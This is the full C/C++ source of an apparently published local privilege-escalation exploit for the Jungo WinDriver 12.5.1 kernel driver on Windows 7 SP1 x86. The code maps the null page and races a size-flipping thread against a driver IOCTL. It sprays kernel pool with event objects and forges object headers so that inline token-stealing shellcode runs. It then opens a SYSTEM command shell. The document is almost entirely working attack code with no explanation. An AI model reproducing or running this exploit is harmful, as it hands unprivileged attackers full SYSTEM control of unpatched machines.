Jungo Windriver 12.5.1 Privilege Escalation

`// ConsoleApplication1.cpp : Defines the entry point for the console application.  
//  
  
#include "stdafx.h"  
#include <Windows.h>  
#include <winioctl.h>  
  
#define device L"\\\\.\\WINDRVR1251"  
#define SPRAY_SIZE 30000  
  
typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(  
HANDLE ProcessHandle,  
PVOID *BaseAddress,  
ULONG ZeroBits,  
PULONG AllocationSize,  
ULONG AllocationType,  
ULONG Protect  
);  
  
// Windows 7 SP1 x86 Offsets  
#define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread  
#define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process  
#define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId  
#define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink  
#define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token  
#define SYSTEM_PID 0x004 // SYSTEM Process PID  
/*  
* The caller expects to call a cdecl function with 4 (0x10 bytes) arguments.  
*/  
__declspec(naked) VOID TokenStealingShellcode() {  
__asm {  
hasRun:  
xor eax, eax; Set zero  
cmp byte ptr [eax], 1; If this is 1, we have already run this code  
jz End;  
mov byte ptr [eax], 1; Indicate that this code has been hit already  
  
; initialize  
mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread  
mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process  
  
mov ecx, eax; Copy current _EPROCESS structure  
  
mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token  
mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4  
  
; begin system token search loop  
SearchSystemPID :  
mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink  
sub eax, FLINK_OFFSET  
cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId  
jne SearchSystemPID  
  
mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token  
mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process  
  
End :  
ret 0x10; cleanup for cdecl  
  
}  
}  
  
BOOL map_null_page()  
{  
/* Begin NULL page map */  
HMODULE hmodule = LoadLibraryA("ntdll.dll");  
if (hmodule == INVALID_HANDLE_VALUE)  
{  
printf("[x] Couldn't get handle to ntdll.dll\n");  
return FALSE;  
}  
PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");  
if (AllocateVirtualMemory == NULL)  
{  
printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");  
return FALSE;  
}  
  
SIZE_T size = 0x1000;  
PVOID address = (PVOID)0x1;  
NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),  
&address,  
0,  
&size,  
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,  
PAGE_EXECUTE_READWRITE);  
  
if (allocStatus != 0)  
{  
printf("[x] Error mapping null page\n");  
return FALSE;  
}  
  
printf("[+] Mapped null page\n");  
return TRUE;  
}  
  
/*  
* Continually flip the size  
* @Param user_size - a pointer to the user defined size  
*/  
DWORD WINAPI flip_thread(LPVOID user_size)  
{  
printf("[+] Flipping thread started\n");  
while (TRUE)  
{  
*(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.  
}  
return 0;  
}  
  
DWORD WINAPI ioctl_thread(LPVOID user_buff)  
{  
char out_buff[40];  
DWORD bytes_returned;  
  
HANDLE hdevice = CreateFile(device,  
GENERIC_READ | GENERIC_WRITE,  
FILE_SHARE_READ | FILE_SHARE_WRITE,  
NULL,  
OPEN_EXISTING,  
FILE_ATTRIBUTE_NORMAL,  
0  
);  
  
  
if (hdevice == INVALID_HANDLE_VALUE)  
{  
printf("[x] Couldn't open device\n");  
}  
  
NTSTATUS ret = DeviceIoControl(hdevice,  
0x95382623,  
user_buff,  
0x1000,  
out_buff,  
40,  
&bytes_returned,  
0);  
  
CloseHandle(hdevice);  
return 0;  
}  
  
void spray_pool(HANDLE handle_arr[])  
{  
//create SPRAY_SIZE event objects filling up the pool  
for (int i = 0; i < SPRAY_SIZE; i++)  
{  
handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");  
}  
  
for (int i = 0; i < SPRAY_SIZE; i+=50)  
{  
for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)  
{  
CloseHandle(handle_arr[j + i]);  
handle_arr[j + i] = 0;  
}  
}  
}  
  
void free_events(HANDLE handle_arr[])  
{  
for (int i = 0; i < SPRAY_SIZE; i++)  
{  
if (handle_arr[i] != 0)  
{  
CloseHandle(handle_arr[i]);  
}  
}  
}  
  
BOOL check_priv_count(DWORD old_count, PDWORD updated_count)  
{  
HANDLE htoken;  
DWORD length;  
DWORD temp;  
DWORD new_count;  
PTOKEN_PRIVILEGES current_priv = NULL;  
  
if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))  
{  
printf("[x] Couldn't get current token\n");  
return FALSE;  
}  
  
//get the size required for the current_priv allocation  
GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);  
  
//allocate memory for the structure  
current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);  
  
//get the actual token info  
GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);  
new_count = current_priv->PrivilegeCount;  
  
HeapFree(GetProcessHeap(), 0, current_priv);  
CloseHandle(htoken);  
  
temp = old_count; //store the old count  
*updated_count = new_count; //update the count   
if (new_count > old_count)  
{  
printf("[+] We now have %d privileges\n", new_count);  
return TRUE;  
}  
else  
return FALSE;  
}  
  
int main()  
{  
HANDLE h_flip_thread;  
HANDLE h_ioctl_thread;  
HANDLE handle_arr[SPRAY_SIZE] = { 0 };  
DWORD mask = 0;  
DWORD orig_priv_count = 0;  
char *user_buff;  
  
check_priv_count(-1, &orig_priv_count);  
printf("[+] Original priv count: %d\n", orig_priv_count);  
  
if (!map_null_page())  
{  
return -1;  
}  
  
*(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;  
  
user_buff = (char *)VirtualAlloc(NULL,  
0x1000,  
MEM_COMMIT | MEM_RESERVE,  
PAGE_NOCACHE | PAGE_READWRITE);  
  
if (user_buff == NULL)  
{  
printf("[x] Couldn't allocate memory for buffer\n");  
return -1;  
}  
memset(user_buff, 0x41, 0x1000);  
  
*(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x51  
  
//pool header block  
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1  
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag  
  
//QuotaInfo block  
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge  
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge  
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge  
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock  
  
//Event header block  
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount  
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount  
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree  
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER  
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo  
*(ULONG *)(user_buff + 0x400) = 0x00000000;  
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged  
  
  
  
/*  
* create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34  
* Set its priority to highest.  
* Set its mask so that it runs on a particular core.  
*/  
h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);  
SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);  
SetThreadAffinityMask(h_flip_thread, 0);  
ResumeThread(h_flip_thread);  
printf("[+] Starting race...\n");  
  
spray_pool(handle_arr);  
  
while (TRUE)  
{  
h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);  
SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);  
SetThreadAffinityMask(h_ioctl_thread, 1);  
  
ResumeThread(h_ioctl_thread);  
  
WaitForSingleObject(h_ioctl_thread, INFINITE);  
  
free_events(handle_arr); //free the event objects   
  
if (check_priv_count(orig_priv_count, &orig_priv_count))  
{  
printf("[+] Breaking out of loop, popping shell!\n");  
break;  
}  
//pool header block  
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1  
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag  
  
//QuotaInfo block  
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge  
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge  
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge  
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock  
  
//Event header block  
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount  
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount  
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree  
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER  
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo  
*(ULONG *)(user_buff + 0x400) = 0x00000000;  
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged  
  
  
spray_pool(handle_arr);  
}  
  
system("cmd.exe");  
  
return 0;  
}  
  
`